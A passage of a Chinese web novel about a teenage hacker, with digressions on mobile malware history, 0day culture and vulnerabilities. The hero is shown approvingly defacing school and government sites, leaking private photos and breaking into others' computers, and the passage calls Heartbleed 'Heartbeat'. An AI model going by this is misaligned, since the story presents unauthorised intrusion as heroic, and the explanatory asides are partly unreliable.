依然还是这一年,第一个跨平台的手机网银恶意木马软件Zitmo被发现。这一年手机游戏,盗版软件,和破解系统开始步入飞速的发展。这一年里IOS的越狱行为属于合法行为在美国通过了法案,在这之后果粉们可以自由自在地越狱了,而不用担心警察了。在一年由一批顶级的黑客学术专家和IT行业的巨头组成的会议拉开了帷幕,乌云平台的白帽子手机黑客们想这些大牛们报告了移动应用的漏洞。同时也是这一年,国内的手机行业开始了重新洗牌。这个新兴的领域,逐渐吸引了一批有一批巨头们的眼光,同时在智能手机飞速发展的这几年里,创造了一大批的巨头,同时也有一大批原来的巨人开始逐渐的倒下,最终逐渐消失在变革的尘埃中。

IOS的第一个恶意代码病毒就是大名鼎鼎的蠕虫lkee,它在澳大利亚被白帽黑客发现。这个蠕虫病毒,它在攻击了越狱后的ios设备之后,利用越狱后的SSH服务密码默认设置为ALPINE来进行自身传播。在同时,第一个Android的恶意代码软件FakePlayer在俄罗斯被发现,这个恶意代码的主要功能就是发送扣费短信。并且还能发送广告邮件和敲诈邮件。

2010年12月29日,Android平台的第二个木马软件Geinimi开始出现在网络上,Geinimi是第一个由国内黑客所开发的恶意软件,也是当年全世界最厉害的恶意软件。Geinimi实现了远程控制、拦截删除短信、拨打电话、回传短信、安装软件等,在对抗上,采用了代码混淆、代码加密、入口点代码变形、TCP层直接通信等技术。这款木马软件充分包含了开发者的想象力,并且迅速的证明了开发者的想法。这款木马代码也是跨时代的,它将移动安全又推向了另一个高度。

从IOS与Android发布的第一天起,iOS就和“越狱”这个词绑在了一起,而Android与IOS相比有着更加开放的系统设计和产业生态。由于黑客的推动,智能手机的第三方应用软件开始兴起。黑客们的关注焦点开始转移到盗版、破解、篡改、重新分发等。在国内,这个问题甚至形成了庞大的黑客产业链,而所有的开发者所面对的最棘手的问题也就是那些恶意攻击的黑客。

危险漫步说的头头是道,林雨生一阵头痛,“你刚才在哪儿,大森林?”

危险漫步脸一红,摆了摆手,“什么虹不虹的,我没去楚虹那里。”

林雨生一愣,继而笑,先在窗边,最后似乎是笑得没力气,卧倒在沙发上笑。危险漫步一头雾水,想今天这林雨生吃错药了么什么事这么开心笑成这样。仔细琢磨,才反应过来来这小子是在笑自己,他问的是去没去大森林,但是自己回答的是没去楚虹那里,这显然是此地无银三百两。

算了,越描越黑。危险漫步起身,回自己房间。楚虹是他第一天来古店时候认识的,大森里网吧是她的哥哥开的,下课之余,她常帮哥哥管理,当然,并不是义务劳动,楚钟是古店一家安全企业的副总监,拥有丰富的技术知识,楚虹有事没事就向楚钟请教。

《四签名》的结尾,福尔摩斯向华生表明他是一个不婚主义者,福尔摩斯认为爱情是一种情感的事情,它与冷静思考相悖,会影响他的判断,所有他坦言自己一辈子都不会结婚。

危险漫步赞同福尔摩斯的部分观点,理智与情感的确有冲突的地方,情感也的确在一定程度上影响判断,但是危险漫步倒不是一个不婚主义者,每次看见楚虹,危险漫步就想,影响判断就影响判断吧,都爱情了,还要么理智?

“咳咳。”危险漫步倚在网吧的柜台前,红着脸把福尔摩斯的一套理论背给她听,楚虹歪着脑袋,笑吟吟地看着他,危险漫步继续道:“我本来也是个不婚主义者,但是自从遇见了你,就不再是了。”

楚虹:“你这是在向我求婚么?”

“不是。”危险漫步摇头,有些尴尬,硬着头皮说:“没到那一步,年龄不够,领不了小本本。”

楚虹说,那当我们年龄够了,你这算是求婚么?

危险漫步接着摇头,“不是,没钻戒呢。这么漂亮的大美女站我面前,然后一辈子放我这了,我就这么随口说说,呃,挺没礼貌的是吧。”

楚虹的脸上浮起一片红云,她捂着嘴说,那当你手里现在有钻戒,这算是求婚么?

危险漫步的头再摇就变成拨浪鼓了,“还是不算吧,我们还没正式在一起呢。”

楚虹:“那你这算是表白么?”

危险漫步继续摇头,又点头。“我们在一起吧。”这次换楚虹摇头了,她面带一丝羞赧,“我又没说我一定会答应。”

这下丢人丢大了,当面告白,胡诌的话一句没想起来,现场随意发挥又被拒绝。失败。

危险漫步低着头,头发垂得很低,遮住了他大半个脸。楚虹见他这个样子,咯咯咯地笑了起来,要他把头发剪剪,再长就扎辫子了。危险漫步调节的能力很快,听楚虹此番这样讲,当即道:“你这是在关心我,只要你答应我,我立马去溜一个光头!”

“谁关心你了。”楚虹大量着危险漫步,“你剪光头一定很难看,还是不要剪了。”

危险漫步问楚虹,这是答应自己了么?他等着楚虹又说诸如谁答应你了之类,可是楚虹低头沉思一会儿,“你喜欢我么?”

这个问题突然冒出来,吓了危险漫步一跳。不过这不是废话么,我不喜欢你我和你谈什么恋爱弹棉花啊!

答案是毋庸置疑的。楚虹眯起眼睛,说答应也不是不可以,但是有一个条件。

虽然危险漫步从未说出我是黑客、我是计算机高手这种蠢话,但他强硬的技术却是事实。是金子总是藏不住的,林雨生在古店的第一天就给了地痞流氓一个下马威,加之萧让那句“看得出你是黑客”更是如炸药桶般爆炸,慕名者众多,甚至有时候在大森里上网,都能听边上几个人谈论他的光辉事迹,这让危险漫步感到很郁闷,他除了第一天出现时候被人讹诈行为过激,似乎从未显山露水,哪来的光辉事迹可以供好事者整日相传?而且那天他不过是控制一个小小的机子罢了,内行人眼里微不足道的事,却被人拿来大肆炒作,这要是传出去,肯定是要被人笑话的。

危险漫步向邻桌问问他们口中的自己到底是什么形象,不问不要紧,问了更让自己郁闷。这些人普遍不知道自己的真实姓名,因为他是从东州来的,所以这些人给他起了绰号,叫东洲来客。除了基本信息,一人一个花样。从他出来古店起,有人说他是打击了古店的黑帮龙头,入侵了黑老大的私人计算机,曝光了黑老大的财务账单……

后面的事就更离谱了,有人说东洲来客黑掉了古店漫安的网页,漫安修好网页之后,却在网页里发现木马,木马几乎在瞬间感染里漫安的所有电脑,奇怪的是,木马的爪牙仅限于漫安大厦,并没有飞入寻常百姓家。做为国内排满考前的安全软件制造伤,该木马的出现无意是让自己被打脸,自己的电脑都不安全,那用户还敢用你的安全软件?

24小时后,木马自动消失,只有漫安总裁的私人电脑里留有一份简单的不能再简单的个人资料信息。

随后,东洲来客便成为漫安的技术总监。

有人说,东洲来客一向独来独往,不会偏暗于一家安全软件,他于XX年X月XX日攻击了美国海军特种部队官方网站,被FBI通缉结果FBI的人大门还没出,自己的网站又被东洲来客黑掉了。

……

危险漫步一阵恶寒,这些人也真敢说。虽然这些入侵他的确都能做到。不过,他可以在FBI头上插小红旗,但是却不能全身而退。如果一个黑客让别人握有把柄,无意是把自己的命门交给别人保管。

最奇怪的是,这些人并不知道东洲来客是谁,甚至连是男是女都不清楚,有人说他是个高大威猛的男子,也有人说她是漂亮时尚的美人……

“真厉害,真想拜他为师。”危险漫步颤颤巍巍的说,连额头上的汗都忘记擦了一把。

边上的人见危险漫步这副模样,见怪不怪,像是回答危险漫步的话,又像是自言自语,“像我们这种人,就算遇到一次给他提鞋的机会,也鸡犬升天了。”说这话的时候,眼睛瞄着网吧的天花板,一副入神的样子,仿佛马上就能帮东洲来客提鞋,接着羽化而登仙。

危险漫步擦了一把汗,琢磨着这里面肯定有什么隐情,不然不会莫名奇妙地炒出一个东洲来客的,可是这件事又没有线索,更无法解决,总不能说自己就是东洲来客,然后辟谣吧。

网吧的客人云里雾里,楚虹却略知一二。虽然危险漫步还只是个学生,不过技术的确已不容小视。

楚虹向危险漫步发起挑战,如果危险漫步能赢,那么她便答应做他的女朋友。比赛的内容很简单,入侵网吧的一台机器,谁先成功算谁赢。

危险漫步听后大喜,直叹天助我也。如果楚虹提稀奇古怪的比赛,那自己肯定是输定了,但是比计算机,就是放眼整个古店,危险漫步也敢说没人技术在他之上。但是除了魔幻的东洲来客,他没有任何一丁点名气,一是危险漫步觉得自己需要一个契机,一个让众人认识自己并且信任自己的契机,再者,危险漫步意在打造一个黑客团队,而不是自己单飞。

走到电脑前,危险漫步忽然觉得就这样赢有些不够有趣,看着电脑里QQ的标志,危险漫步忽然心生一计。

他要楚虹稍等一下,他要做一些准备。楚虹一撅嘴,挥手说快点。她做在电脑前,QQ忽然闪了起来,是危险漫步的。楚虹点开,发现不过是个金馆长的表情包。她回了一个菜刀的表情,危险漫步在对面探出颗脑袋,“可以了。”

楚虹随机选中一台计算机打开,看危险漫步一副信心满满的样子,不觉想杀一杀他的威风。楚虹并不掌握入侵的技术,楚钟教她的都只是些皮毛,可以说她还处于半瞎的状态,就去尝试入侵了。如果接触楚钟之前交给她的工具,她也得捣鼓半天才能拿下。不过,她手里还握有网吧的一项漏洞,安全人员还没有过来,如果利用这项漏洞,十秒都不到就可以轻松拿下网吧的任何一台机子。

不知不觉已经过去了五分钟,对面还是一点动静都没有,楚虹有些纳闷,依自己的判断,危险漫步五分钟应该绰绰有余才对,怎么还没发出提示呢?

算了,再等一等。

又过去五分钟,楚虹有些急了,她抬头看危险漫步,却发现他正一脸笑意地盯着自己。

“你干嘛,这么慢。”

危险漫步阴阳怪气的说,“说我慢,你成功了么?作弊都不会,唉。”

楚虹白皙的脸颊红一阵白一阵,也不知危险漫步是有意还是无意,总之被他一气,楚虹放弃再等危险漫步一会儿的念头,直接利用漏洞拿下选中的电脑。

楚虹得以地看着对面的危险漫步,危险漫步并不慌张,抬手看了眼手表,道:“你等了我十分钟,三十七秒。”

楚虹一愣,危险漫步打了一个响指,示意楚虹看显示器。危险漫步一个回车之后,楚虹的显示器上出现一朵朵玫瑰,逐渐围成一个爱心状。接着玫瑰花增多,逐渐铺满全屏,然后摆出各种图形。其间危险漫步本可以添加些文字,但怎么写都觉得肉麻,他原本连这个多年前流行的非主流表白程序都不想发做,但是既然想让楚虹明白自己入侵了她的电脑,又不想惹她生气,只有这个最傻瓜的方法了。

空荡荡的程序,最后,危险漫步还是放了一段文字,既然写什么都肉麻,那就放一段歌词吧。

原来你就是未来

我能看见门在打开

我不后退

当你慢慢靠近我

我的节拍突然停摆

再次确定我的真爱

你是我这生命中世上独一无二

……

楚虹的脸红彤彤的,抬起头却不见危险漫步的身影,她站了起来,才发现危险漫步不知什么时候已经绕道了自己的时候。

唔——她还未来的及说什么,危险漫步的嘴巴已经印上了她的红唇。

 

第二十章  不速之客


危险漫步沉浸在回忆里,脸上还对着一丝猥琐的笑意,所以当听见破门而入的声音时,着实吓了一跳。

林雨生看见躺成大字形的危险漫步突然一蹦三尺高,有些莫名奇妙。“怎么了么?”

危险漫步有些恼:“什么怎么了,我还要问你呢,怎么了?”

林雨生一头雾水,不就是没敲门么,至于这么激动。他告诉危险漫步,门外有人找他,但是既不报姓名,也不说目的,怎么盘问都是一句话:我来找危险漫步。

危险漫步还在郁闷当中,他站着不动,像被定住了一般。“让老萧去解决好了。”

林雨生也开始郁闷了,“老萧你又不是不知道,自从你上次吓唬他之后,陌生人敲门他都太不敢开的,我怀疑,他脑子可以出现了一些问题。”

危险漫步无奈地走出房间,他多么希望来的人是楚虹,不过这种想法一出现又被他扼杀掉。萧让和林雨生都认识楚虹。开门的瞬间,光线照在门外的人的身上,他倚在走廊中的水表门上,黑色的板鞋,黑色的牛仔裤,白色T恤,外套一件黑色的薄风衣,低着头,刘海遮住了眼睛。

危险漫步问:“找我什么事。”

他抬起头,直起身子看着屋里。危险漫步大量眼前的来着,他身高与自己相仿,只是看起来还要消瘦一些。五官端正,谈不上帅气,但是很清秀,架着一副黑框眼镜,但是挡不住眉宇间的英气。

危险漫步觉得眼前的人有些眼熟,但是一时间想不起他是谁。

来的人说:“是危险漫步么。”

危险漫步点点头。想了半天,还是想不起对方是谁。

“汪青蓝。”

“我操,怎么变成这副——人模狗样的。快进来说。”

自从危险漫步把博客交给汪青蓝打理,两个人便再也没有联系过。危险漫步和林雨生日常除了泡在计算机上,已经很少再去学校了。单招之前,两人一周请假十几遍,请得老师头都痛,高三学业紧张,这俩小子竟然还成天往网吧钻。班主任无心管教他们,索性放任不管。后来,两人单招同被古店商学院录取,更加不去学校。如果哪天两个人心血来潮,跑学校里溜达一圈,同学老师竟会像看怪人一样看着他们。危险漫步毫不在意一样的目光,道不同不相为谋,他看他们还觉得奇怪呢!

汪青蓝意在国内一家名牌大学建筑系,该学校的建筑系在国内高校中名列前茅,竞争颇为激烈。对自己分数不够自信的学生,可以画一张建筑设计图纸,若是能让该系主任满意,加之平日成绩优秀且稳定,便可申请保送。

保送的诱惑虽然很吸引人,但是条件未免太苛刻了一些,若是定个分数,达到了能保送,那有意的莘莘学子便会拼了命的学习,不到头破血流不罢休。

然而不是。成绩只是条件的一小部分,关键还是看建筑图,这就有些强人所难了,高中根本就没有建筑这一课程,画建筑图,说得挺容易,一张破图,可是一问三不知的人怎么画?

再看所谓的,让该系主任满意。前年该大学建筑系一共保送了两名学生,他们交上去的图纸开学后被公布,内行看门道外行看热闹,这俩张图纸的出现让内外行的人皆叹为观止,就是该系已经毕业的人,也未必有这样的水准。

再看两名学生的家世。第一位学生的父亲是国内著名的建筑师,第二位的爷爷叫铁铭,这个名字没几个人知道,但是铁铭有个老师,叫梁思成。

得,不是建筑二代就是建筑三代,起跑线已经输了,后续力又不足,这还比什么。

汪青蓝本来并未打算依靠保送进入该大学,一个偶然的机会,他获得了一本大学建筑系的教材,他花了几天琢磨,很快便展现出了过人的天赋。汪青蓝又购买了一些建筑设计方面的书籍,他已渐渐转移中心至设计图上。

一天,他去参加市里举行的建筑设计竞赛,本来是被同有建筑设计兴趣的朋友拉去的,结果他却在参赛的图里发现自己设计的那一份。朋友原想冲过去找那人理论,却被汪青蓝拦住。这种活动是市里举办的,最后环节市里的电视台还会播放,即便参赛者真的会有剽窃行为,那么举办方也会要求私下处理,大声嚷嚷的结果只有一条——被请出现场。

既然对方已经抄走,那么着急一时半刻也没有意义,再者,既然对方敢堂而皇之地把作品亮相,那么一定也有一定的自信让自己找不到把柄。汪青蓝想了一会儿,家里一直没有被偷窃的现象,唯一可行的手段是通过计算机剽走的。可是汪青蓝想不通的是,为什么对方知道自己在设计这么一个东西,这件事只有和他同来的朋友知道。

汪青蓝看了眼身边的朋友,摇了摇头。继续想可能泄露信息的事情。他忽然想到朋友之前曾拉他进一个群,群里都是些对建筑方面有兴趣的人,其中有两个还是那所大学建筑系的学姐。虽然建群的初衷是讨论建筑方面的知识,不过后期越聊越没边,完全变成里一个杂聊群。举办方处有每个参赛者的资料,汪青蓝轻而易举地拿到了剽窃自己作品的人的QQ,他迫不及待地在群里进行一番搜索,群里果然有这个人,胆子够肥,群也不退。群名片是老凯,记下老凯的QQ后,汪青蓝对朋友说,仔细看看参赛者,说不定他的图也被剽走了。朋友一愣,汪青蓝忽然想到这家伙是手绘的图,忙说是开玩笑。

听完汪青蓝说的事情经过,危险漫步三人非常气愤,林雨生的恨不得背上插上翅膀飞到东洲去,把老凯海扁一顿。萧让心里想这个叫老凯的,这次要倒霉了,剽窃谁的后不好,偏偏要剽汪青蓝的。哦,其实剽窃汪青蓝这本没什么好惊讶的,如果水平出众,被盯上在所难免,不道德的事情自己又无证据,现在网络警察水平远低于黑客,报案基本无效。如果非要在计算机内进行一些重要的工作,那么安全绝对是第一要素,这是最不容忽视的。

既然危险漫步放手把博客交给汪青蓝,那就不能说汪青蓝是个不靠谱的家伙,至少基本的安全工作是一定做好了的。那么对方的实力应该也不容小觑,不过,在危险漫步面前,也不过是个只会那计算机技术用去剽窃获得非法利益的小烂仔而已。

以这类方式遇到危险漫步只能怪他倒霉,因为这戳到了危险漫步的痛处,唉。萧让心理嘀咕来嘀咕去,往沙发上一躺,伸个懒腰。目光正对上一边的林雨生。

“林雨生啊,你刚刚是不是说我脑子有问题?”

林雨生大窘,没想到别萧让听见了。他摆手指着危险漫步,“说正事。”

三人的目光都聚集在危险漫步的身上,或许是被盯得实在受不了,危险漫步轻咳一声,“走吃饭吧,我们数十年没聚一聚了。”

“我倒。”萧让尖叫一声,从沙发上滑倒地上。

四人刚到公寓的门口,田依迎面走了过来。她今天回来得比平常晚些,林雨生关切地问这么了,田依笑了笑,到发工资时候了,她得合帐。

走在队伍面前的危险漫步又此刻又退了回来,他嬉皮笑脸地对田依说:“依姐,今天我有个老朋友从东洲过来看我,”他指了指身旁的汪青蓝,“这么晚了也不方便回去了,能不能——”说到这里,危险漫步停住了,脸上的笑容变幻莫测。

田依眉毛一挑,“谁是你依姐。” 她知道危险漫步要说什么,并不顺着他的话往下说。

危险漫步笑容不减,“能不能让雨生去你那里——去你那里挤一晚。”

田依:“不是你朋友来的的么,你那边要是住不下为什么不叫他过来挤一晚。”

危险漫步:“依姐说得是,那我就让青蓝过去挤一晚。”

田依大窘,显然自己是被危险漫步套路了。一旁的林雨生无比尴尬,汪青蓝不清楚几人的关系,一头雾水。田依红着脸,“我拒绝。”危险漫步一听,道:“这就对了么,你和青蓝又不熟,他去你那你暂住多尴尬啊,我呢就去不去了,老萧看着也不像是好人,就雨生老实,和你也最熟。”

被扣上“不像好人”的萧让憋着笑,看着田依,田依道:“我不!我这边只有一张床。”

晾了半天的林雨生终于冒了出来,“其实我不介意睡一张床的……”

田依恼羞成怒,“你滚!”说完头也不回地往公寓走。危险漫步瞪了林雨生一眼,骂了句蠢货,赶紧追到田依身边,一边道歉,一边邀请她一起吃饭。田依并不答应她,径自走自己的路。危险漫步一路跟到门口,田依才有松口,她教危险漫步下去等她,她换身衣服。

危险漫步走下楼,萧让和汪青蓝蹲刚才的地方,林雨生则站在楼梯口。危险漫步看见他,一副恨铁不成钢的样子。汪青蓝一脸无辜,不知道自己做错了什么。

“我懒得骂你。”危险漫步走几步又反身回来,对危险漫步说,“你们现在又没有交往,你平时和她开玩笑什么的都无所谓,今天晚上我是真的想让你过去睡,虽然你只可能睡沙发。”

林雨生很郁闷,他本也只想开个玩笑,没想到惹的田依生这么大的气。他站在原地,双手挥舞,但是一时想不到什么来申辩。

田依已经换好衣服下来,看林雨生这个样子,不禁“噗嗤”笑了出来,林雨生愣愣地望着他,不知道自己又做错了什么。

田依穿得很休闲,板鞋,牛仔裤,针织衫,简素的装扮依旧遮盖不住身体里散发出的那股灵气。

林雨生道:“你好漂亮。”

田依脸一红,瞪了林雨生一眼,继续往前走。危险漫步走到汪青蓝旁边,对田依说:“对了,我还没给你们介绍,这位是汪青蓝,我们的朋友。”又对汪青蓝说:“这位,田依,她是林雨生——她也是我们的朋友,她和雨生关系最好。”

汪青蓝看看田依,又看着林雨生,马上明白了怎么回事,他冲田依笑了笑,一行人商量吃些什么。

一顿饭的时间,田依终于受不了既然的轮番轰炸,答应让林雨生过去借宿一晚,虽然只有睡沙发的份,但是林雨生已经足够开心了。危险漫步向汪青蓝问了一些具体的情况,汪青蓝告诉他,建筑图初期草稿部分都是手绘,后期才逐渐在计算机里绘图。把草稿和成品放在一起对比,很明显这是一组。

危险漫步听完,觉得这样事情就简单许多了,两人决定第二天去一趟东洲。

第二天一早,危险漫步和汪青蓝整装待发,林雨生从隔壁回来,睡眼朦胧,头发乱糟糟的。危险漫步打趣道:“ 你昨晚做什么了,头发乱成这个样子。”

林雨生回敬一个大大的白眼,道:“我头发睡一次一个样你又不是不道。”

危险漫步笑了笑,问他去不去东洲。林雨生摇头,“今天田依休息,我和她一起去看电影。昨天她答应我,如果我挑的电影她满意的话,他就答应我和我在一起。”

危险漫步林雨生选的什么电影,林雨生说是《十二公民》。

危险漫步点了点头,估计今天林雨生可以脱单了,既然女生说出这种话,只要电影不蠢——吓死人的恐怖,少儿不宜的三级之类,那么她们一般都会点头。《十二公民》翻拍自经典影片《十二怒汉》,阵容都是演话剧的老戏骨,不会差到哪儿去。整部电影除了开头与结尾加起来不到五分钟是其他场景,其余时间都是在室内,十二个人一张桌子,创意性非常高,故事情节也非常吸引人。

危险漫步拍了拍林雨生的肩膀,笑着说:“恭喜啊。”林雨生狐疑地乜了他一眼,进卫生间洗澡了。看着林雨生的背影,危险漫步忽然想起之前问楚虹,既然可以在网吧工作帮家里的忙,又为什么要继续学业。

楚虹的反应比较激烈,说她可以因为危险漫步的这句话而分手,三观不同,谈什么恋爱。

危险漫步解释说:“也不是,只是纯粹地问一个问题罢了,没有半点教唆你放弃学业的成分。说来好笑,以前学校曾除夕那过一个组织,它不叫什么帮什么会,而叫坏学主义。这个组织里的人对好学生有很大的偏见,仍为好学生都是没出路的,成绩好一点用也没有。滑稽的是,他们自己编了很长的条文,来阐述该主义,还引经据典,像比尔盖茨,乔布斯都榜上有名。不过,不知这些人是否有能力考入哈佛大学。”

校方一度以为这个组织是危险漫步创立的,也不能怪学校,危险漫步太符合这样的条件了,单凭把三任校长和校长情妇的照片挂在学校官网上的行为,就让它拥有了大量的拥趸,这也是他整日旷课,学校不敢碰他的原因之一。一次,危险漫步旷课和一个挑战者想约比赛,谁先拿下XM公司网页的访问权谁就赢,这是XM公司网络安全部门为了测试网页是否安全而举办的比赛,危险漫步放开手脚,轻松打入决赛,眼见着就要成功,却被年级主任从网吧拎回学校。

危险漫步很生气,后果很严重。第二天学校的官网又被黑,这次公布的内容不再和桃色有关,却让主任更惨:网站上公布了一些账单,账单里详细记录了学生家长为了撤销孩子的处分而进行的贿赂,以其主任三年来为学校实验室、图书馆等采购吃下的回扣。

该主任有个习惯,上班的第一件事就是登陆学校的网站,在“学校寄语”一栏留下些没什么用的话。偶尔学校网站被黑,放张桃色照片,他就嘿嘿一笑,跟着看热闹。

这天他登陆学校网站,后台却这么进也进不去,再看首页出现再账单,主任脸都绿了,什么也顾不得收拾,拽起笔记本就往门外跑,不过为时已晚,两辆警车已在学校门口等待着他。

此事一出,古店中学的官网就有了绰号:古店中学职工新闻平台。虽然很多人都清楚这事就是危险漫步动的,但是无奈所有的人都没有证据。

危险漫步成绩不行,也很符合坏学主义里的条文,怎么看,这个组织建立者都是危险漫步,但是这次的确是校方冤枉他了,危险漫步内心的想法是一个人出人头地,方法有很多,未必靠学习成绩。而非百无一用是读书,后者的理论他向来不敢恭维。

危险漫步问楚虹以后想做什么,楚虹想了想,“等毕业,选专业再看看吧。”

危险漫步又问:“你之前,没有什么喜欢的意向么,就是喜欢什么、兴趣之类。”

楚虹:“也没有太具体的意向吧,之前哥哥一直教我一些计算机方面的技术,我还算蛮有兴趣的,如果可以的话就选这样的专业咯。你呢?”

危险漫步往身后的草地上一躺,阳光略有些刺眼,白云在蔚蓝的天空中缓缓飘动,不见一丝瑕疵。

他换了一支狗尾草叼在嘴里,道:“我要建立中国第一的黑客组织。1的话永远是1,但是如果是1+1,那么久可以有大于2,大于3的效果。”

楚虹回过头看眼前的男孩,他的目光里带着与年龄不相符的坚毅。也许是注意到有人在看自己,危险漫步对楚虹说:“要不要考虑加入我们?” 

楚虹摇头,心事重重的样子:“我是什么水平我还是有自知之明的,你拉我入伙,就变成1+1小于2了。我看,我也只能做你的贤内助了。”

危险漫步一愣,收起脸上的笑容,换作一副认真的表情:“我牙有点痛。”

楚虹:“这么了么?”

危险漫步:“也没什么,太甜了。”笑容终于还是没有憋住,楚虹的粉拳已经砸了过来。

大巴的空气总是浑浊,危险漫步把窗户打开透气,无聊的路程,只有回忆能带来些许快乐。危险漫步索性给楚虹打了个电话,结果被楚虹痛骂一顿——楚虹还未起床。

危险漫步心里一阵郁闷,就这还贤内助呢,咸内助还差不多。危险漫步身旁的汪青蓝也睡得真香,他毫不担心危险漫步解决问题的能力,所以操心也没什么好操心的,倒不如睡个好觉。

危险漫步一阵无聊,路上连个说话的人都没有,昨晚和汪青蓝聊天到半夜,车上颠簸他睡着了也很正常。老萧这时候估计还在睡觉,林雨生又约会去了,唉。

危险漫步闭上眼,却怎么也没睡着。

此刻,林雨生和田依正在电影院里看电影,这是应该算一部悬疑剧情片,林雨生有些后悔,想自己应该看爱情片的,这样在片中男女拥吻时候,他可以乘机牵手什么的,可惜啊……


第二十一章  原形毕露


阿姨好,叔叔好。

一进屋,危险漫步热气地和汪青蓝的父母打招呼,他们一眼就认出了眼前的少年是儿子小时候的伙伴,热情地与之叙旧,危险漫步直到吃完饭才抽出身和汪青蓝研究建筑图被盗的事。

汪青蓝拿出草稿,又把电脑里的成品给危险漫步看。危险漫步端详了下,他对建筑毫无树建,不过草稿对应成品还是很明显的,找出对方入侵证据就可以了。

简单起见,危险漫步拖出U盘,查看DNS记录和工作日志。危险漫步问汪青蓝是否知道那家伙的名字、住址。这点汪青蓝早有调查过,老凯真实姓名叫吴仕凯,就是东洲人,家住一个叫明岸花都的小区。危险漫步点头,追踪工具已经把那边的IP显示出来,查了一下明岸花都的IP段,竟然吻合。危险漫步以为是自己看错了,检查一遍,还是吻合,危险漫步摇了摇头,没想到这家伙连跳板都懒的设,是菜鸟还是太轻敌?

运气不错,对方在线,危险漫步设好跳板,直接过去,访问对面工作日志,疯狂截图,掌握证据。

危险漫步把证据打包好,就开始在电脑前监视吴仕凯。经过两天的观察,危险漫步发现吴仕凯就是一个不折不扣的菜鸟,技术甚至连林雨生还不如。他是东洲一所职专计算机学院计算机协会的副主席,副主席给他做,完全凭借他溜须拍马的功夫,也是因为副主席这一职位,他打听到了不少黑客消息。苦于技术受限,自身又懒得学习,铤而走险,买了一个软件的0day。

所谓0day,最早用于软件和游戏破解,属于非盈利性和非商业化的组织行为,其基本内涵是“即时性”。专门针对软件的,起先叫做WAREZ,后来才发展到游戏,音乐,影视等其他内容的。0day中的0表示zero,早期的0day表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。 0day是一个统称,所有的破解都可以叫0day。

今天,0day泛指所有在官方发布该作品之前或者当天,这主要涵盖了影视、软件、游戏、音乐、资料等方面,由一些特别小组以一定的格式打包发布的数码内容。基本上每个0day发布作品中都包含了说明该发布作品的NFO文件,该文件主要包括发布小组的信息、发布作品的信息、破解信息等。nfo文件有专门的软件来查看,其实系统自带的记事本也可以查看。

0day是一种自发的网络运动,,Warez是对破解的泛称;如果有人说他属于0day组织,并不是说他真的在一个叫做0day的破解组织里干活,其真正涵义是他属于某个破解组织,而这个组织经常向0day发布作品。

0day并非破坏组织,他们只是将自己的破解作品以0day的发行形式发布,分享给全世界的人。

再谈一下什么是漏洞。漏洞是指计算机系统在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷和不足。漏洞一旦被发现,攻击者就有使用过漏洞获得计算机系统的额外权限,并在未授权的情况下访问或破坏系统,从而危害计算机系统的安全。

漏洞的出现,是安全机制理论具体实现时出现的非正常情况。比如建立安全机制规划时,在考虑上存在的缺陷、软件编程中的错误、实际使用时认为的配置错误以及不恰当的安全操作规程、负责网络安全人员的培训不足等。

漏洞问题与时间紧密相关,一个系统从发布的那一天起,随着用户的深入使用,系统中存在的漏洞会被不断暴露出来,在被系统供应商发布的补丁修补或在以后发布的新版系统中得以纠正的同时,也会引入新的漏洞和错误。漏洞的修复经常发生延迟,像有些公司或者政府机构未能执行其安全策略,或者因为补丁安装时会扰乱计算机,导致系统管理员花费大量的时间去修改电脑配置来接收新的补丁。

很多不法分子利用漏洞常做一些危害公民的事情,2014年4月8日,网络安全协议OpenSSL的超级大漏洞曝光,这个漏洞早期由谷歌的编程人员发现,由于该漏洞利用了OpenSSL的一个常用扩展工具Heartbeat,因此他们把这个漏洞命名为Heartbeat,受到该漏洞波及,众多用户信息泄露。

危险漫步监视来吴仕凯两天,又搜集到不少为非作歹的证据。把自己的痕迹擦干净之后,危险漫步把吴仕凯剽窃汪青蓝建筑图的证据匿名发送到网监,一个小时后,危险漫步和汪青蓝到了东洲市网监,对吴仕凯的恶劣行为进行控诉。

一天后,吴仕凯因恶意入侵掠夺旁人作品参加比赛被警方逮捕,又过了一天,危险漫步将收集的吴仕凯其他为非作歹的证据匿名发到网监局。第三天,危险漫步拿下中国大学生网和0day中国官网,中国大学生网洋洋洒洒贴上了危险漫步写的一篇文章,矛头直指现在学生阶级的不公正待遇,创作的学生自身安全得不到保障,反倒是盗窃者凭借学生的智慧名噪一时。

0day中国上只有简单一句话:0day漏洞交易是否能保障公众的安全。

危险漫步觉得不快,接着黑掉东洲市和江海市官网,将吴仕凯倚靠偷来的作品参赛的行为公布。

几个网址的底部都留有一行字:路见不平一声吼。

危险漫步不留则已,留了此地无银三百两味道颇深。半天的时间,东州市闹得沸沸扬扬,市长大怒,要求严查吴仕凯一案,另外追查网站被黑一事。市长秘书大学是计算机专业,知道这是黑客行为,对方有备而来,根本不可能查出什么。市长不听,秘书又被骂得狗血淋头。

秘书叹口气,无奈地退出办公室,胸中一股力量但不知向何处发泄,危险的想法瞬间又熄灭了。 

秘书走在偌大的走廊里,暗自摇头,但愿市长不是袁绍吧,不然自己的仕途就到头了。

汪青蓝被请到网监局喝茶,不过这早在危险漫步的预料之中,网监没有证据,汪青蓝又有充分的不在场证明,除了喝茶,网监拿汪青蓝毫无办法,危险漫步甚至把“路见不平一声吼”从何而来想好了:回东洲的第一天,他和汪青蓝走遍各家报社,希望可以曝光建筑图被剽窃一事,几大报社不愿报道,只有一家小报纸一个年轻的编辑愿意接受。发行量小,占的板块小,但这就够了。

等待消息的过程非常无聊,危险漫步看着自己带来的U盘,灵机一动,决定教汪青蓝一招。

可以说,现在大家基本上都有U盘了,为了榨取U盘的最大价值,危险漫步决定教汪青蓝对U盘进行量产,那么“量产”到底是什么意思呢?“量产”的意思就是U盘生产工具,U盘生产厂家不像个人,一次就搞一两个U盘,他们的生产都是按批计算的,是用电脑连上USBHUB,同时连上8-16个(甚至更多)U盘,然后使用相应的软件向众多U盘写入相同的数据,完成U盘生产的最后工序,厂家对U盘进行量产操作,U盘才可以正常使用,相当于刷固件。

